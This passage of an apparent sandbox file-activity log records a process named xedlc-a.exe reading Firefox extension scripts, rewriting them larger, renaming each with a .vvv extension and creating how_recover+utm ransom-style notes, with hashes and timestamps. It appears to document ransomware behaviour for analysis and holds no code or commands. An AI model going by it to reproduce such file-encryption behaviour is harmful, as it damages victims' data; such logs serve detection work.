- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\self-maker.js
- filesize: 1454
- md5sum: b4e840953d38c82a388351521ca8dbcb
- sha1sum: 96f02f9f96306a75088b14def205dbe234d33232
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953476243
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 80737
- mode: rename
- sequenceNumber: 1244
- filesize: 1454
- md5sum: b4e840953d38c82a388351521ca8dbcb
- sha1sum: 96f02f9f96306a75088b14def205dbe234d33232
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\self-maker.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\self-maker.js.vvv
- ads:
- fid (ads:): 562949953476243
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 80750
- mode: open
- sequenceNumber: 1245
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\shims.js
- filesize: 2266
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765885
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 80759
- mode: close
- sequenceNumber: 1246
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\shims.js
- filesize: 2686
- md5sum: 6605911e2163e7dc05eee3621db2686f
- sha1sum: 593318d24316db19d63cf6cfef53a19b5d5d9d09
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765885
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 80771
- mode: rename
- sequenceNumber: 1247
- filesize: 2686
- md5sum: 6605911e2163e7dc05eee3621db2686f
- sha1sum: 593318d24316db19d63cf6cfef53a19b5d5d9d09
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\shims.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\shims.js.vvv
- ads:
- fid (ads:): 281474976765885
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 80783
- mode: open
- sequenceNumber: 1248
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tab-browser.js
- filesize: 25192
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765875
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 80907
- mode: close
- sequenceNumber: 1249
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tab-browser.js
- filesize: 25614
- md5sum: 759805c17c7ce4670836aad82fe818e7
- sha1sum: 614dc5d4fca73a7297100b3ee632c1bd7666c1d0
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765875
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 80920
- mode: rename
- sequenceNumber: 1250
- filesize: 25614
- md5sum: 759805c17c7ce4670836aad82fe818e7
- sha1sum: 614dc5d4fca73a7297100b3ee632c1bd7666c1d0
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tab-browser.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tab-browser.js.vvv
- ads:
- fid (ads:): 281474976765875
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 80932
- mode: open
- sequenceNumber: 1251
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tabs\events.js
- filesize: 2112
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953476261
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 80941
- mode: close
- sequenceNumber: 1252
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tabs\events.js
- filesize: 2542
- md5sum: 260150047a5e74b5848dbbeda974df89
- sha1sum: 3f37564059ac70204d56b75b9f2daaf28cd9bac6
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953476261
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 80953
- mode: rename
- sequenceNumber: 1253
- filesize: 2542
- md5sum: 260150047a5e74b5848dbbeda974df89
- sha1sum: 3f37564059ac70204d56b75b9f2daaf28cd9bac6
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tabs\events.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tabs\events.js.vvv
- ads:
- fid (ads:): 562949953476261
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 80965
- mode: open
- sequenceNumber: 1254
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tabs\observer.js
- filesize: 4982
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765900
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 81190
- mode: close
- sequenceNumber: 1255
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tabs\observer.js
- filesize: 5406
- md5sum: 5045d24f83ce91fbc02b49fd0afcd56c
- sha1sum: e18722d2cb51ea432fa561100060599716b04d99
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765900
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 81203
- mode: rename
- sequenceNumber: 1256
- filesize: 5406
- md5sum: 5045d24f83ce91fbc02b49fd0afcd56c
- sha1sum: e18722d2cb51ea432fa561100060599716b04d99
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tabs\observer.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tabs\observer.js.vvv
- ads:
- fid (ads:): 281474976765900
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 81227
- mode: open
- sequenceNumber: 1257
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tabs\tab.js
- filesize: 9861
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953476266
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 81393
- mode: close
- sequenceNumber: 1258
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tabs\tab.js
- filesize: 10286
- md5sum: 988f070a9b488f7bda7a1f8e4f1dd9d6
- sha1sum: ef6194e3ee2f95b1b9a40acc452cc4d8e2deaa71
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953476266
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 81469
- mode: rename
- sequenceNumber: 1259
- filesize: 10286
- md5sum: 988f070a9b488f7bda7a1f8e4f1dd9d6
- sha1sum: ef6194e3ee2f95b1b9a40acc452cc4d8e2deaa71
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tabs\tab.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tabs\tab.js.vvv
- ads:
- fid (ads:): 562949953476266
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 81481
- mode: open
- sequenceNumber: 1260
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tabs\utils.js
- filesize: 2841
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953476268
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 81537
- mode: close
- sequenceNumber: 1261
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tabs\utils.js
- filesize: 3262
- md5sum: db9517e44b9f26298875daf0d99635e4
- sha1sum: 567968eed19403f256994a8b9c7f3fdd322ee9af
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953476268
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 81551
- mode: rename
- sequenceNumber: 1262
- filesize: 3262
- md5sum: db9517e44b9f26298875daf0d99635e4
- sha1sum: 567968eed19403f256994a8b9c7f3fdd322ee9af
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tabs\utils.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tabs\utils.js.vvv
- ads:
- fid (ads:): 562949953476268
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 81562
- mode: created
- sequenceNumber: 1263
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tabs\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778349
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 81570
- mode: close
- sequenceNumber: 1264
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tabs\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778349
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 81579
- mode: created
- sequenceNumber: 1265
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tabs\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778350
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 81587
- mode: close
- sequenceNumber: 1266
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tabs\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778350
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 81597
- mode: open
- sequenceNumber: 1267
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\test\assert.js
- filesize: 10574
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765880
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 81654
- mode: close
- sequenceNumber: 1268
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\test\assert.js
- filesize: 10990
- md5sum: 193ce27e6b54ade6f0a8e6bee15fabc2
- sha1sum: 09172afa725f5561b4a920ae743c75ee1428306b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765880
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 81667
- mode: rename
- sequenceNumber: 1269
- filesize: 10990
- md5sum: 193ce27e6b54ade6f0a8e6bee15fabc2
- sha1sum: 09172afa725f5561b4a920ae743c75ee1428306b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\test\assert.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\test\assert.js.vvv
- ads:
- fid (ads:): 281474976765880
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 81679
- mode: created
- sequenceNumber: 1270
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\test\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778351
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 81687
- mode: close
- sequenceNumber: 1271
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\test\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778351
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 81697
- mode: created
- sequenceNumber: 1272
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\test\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778352
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 81705
- mode: close
- sequenceNumber: 1273
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\test\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778352
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 81715
- mode: open
- sequenceNumber: 1274
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\test.js
- filesize: 5146
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765864
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 81770
- mode: close
- sequenceNumber: 1275
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\test.js
- filesize: 5566
- md5sum: 0e4a16cc55d06b5268b44de7c1bc2fc6
- sha1sum: 6594c69821b0102979aafb5945a610eab260cadd
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765864
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 81782
- mode: rename
- sequenceNumber: 1276
- filesize: 5566
- md5sum: 0e4a16cc55d06b5268b44de7c1bc2fc6
- sha1sum: 6594c69821b0102979aafb5945a610eab260cadd
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\test.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\test.js.vvv
- ads:
- fid (ads:): 281474976765864
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 81794
- mode: open
- sequenceNumber: 1277
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\text-streams.js
- filesize: 9490
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953476247
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 81849
- mode: close
- sequenceNumber: 1278
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\text-streams.js
- filesize: 9918
- md5sum: d1701edd15aa2e3c2170e8a9e3e62829
- sha1sum: d4346b8d33bf9e8384c80ac541a6b1ac2b156b1a
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953476247
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 81861
- mode: rename
- sequenceNumber: 1279
- filesize: 9918
- md5sum: d1701edd15aa2e3c2170e8a9e3e62829
- sha1sum: d4346b8d33bf9e8384c80ac541a6b1ac2b156b1a
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\text-streams.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\text-streams.js.vvv
- ads:
- fid (ads:): 562949953476247
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 81872
- mode: open
- sequenceNumber: 1280
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\timer-e10s-adapter.js
- filesize: 2658
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953476255
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 81882
- mode: close
- sequenceNumber: 1281
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\timer-e10s-adapter.js
- filesize: 3086
- md5sum: 89a90889b5032f55968c56730cd28b0c
- sha1sum: d4cfea285df373ceb93680b490aba9861e6124d2
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953476255
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 81895
- mode: rename
- sequenceNumber: 1282
- filesize: 3086
- md5sum: 89a90889b5032f55968c56730cd28b0c
- sha1sum: d4cfea285df373ceb93680b490aba9861e6124d2
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\timer-e10s-adapter.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\timer-e10s-adapter.js.vvv
- ads:
- fid (ads:): 562949953476255
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 81906
- mode: open
- sequenceNumber: 1283
